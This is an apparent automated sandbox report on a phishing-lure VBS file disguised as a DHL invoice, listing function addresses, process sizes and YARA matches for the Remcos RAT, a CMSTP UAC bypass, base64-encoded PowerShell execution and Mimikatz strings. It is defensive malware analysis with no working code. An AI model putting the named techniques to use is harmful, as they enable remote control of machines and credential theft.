                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043797E23_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004339D723_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044DA4923_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00427AD723_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041DBF323_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00427C4023_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00437DB323_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00435EEB23_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043DEED23_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00426E9F23_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044B04029_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0043610D29_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044731029_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044A49029_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040755A29_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0043C56029_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044B61029_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044D6C029_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004476F029_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044B87029_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044081D29_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0041495729_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004079EE29_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00407AEB29_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044AA8029_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00412AA929_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404B7429_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404B0329_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044BBD829_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404BE529_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404C7629_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00415CFE29_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00416D7229_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00446D3029_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00446D8B29_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00406E8F29_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0040503830_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0041208C30_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004050A930_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0040511A30_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0043C13A30_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004051AB30_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044930030_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0040D32230_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044A4F030_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0043A5AB30_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0041363130_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044669030_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044A73030_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004398D830_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004498E030_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044A88630_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0043DA0930_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00438D5E30_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00449ED030_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0041FE8330_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00430F5430_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004050C231_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004014AB31_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040513331_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004051A431_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040124631_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040CA4631_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040523531_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004032C831_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040168931_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00402F6031_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00416760 appears 69 times
                    Source: DHLShippingInvoicesAwbBL000000000102220242247.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 11450
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2020
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 11450Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2020Jump to behavior
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 1800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
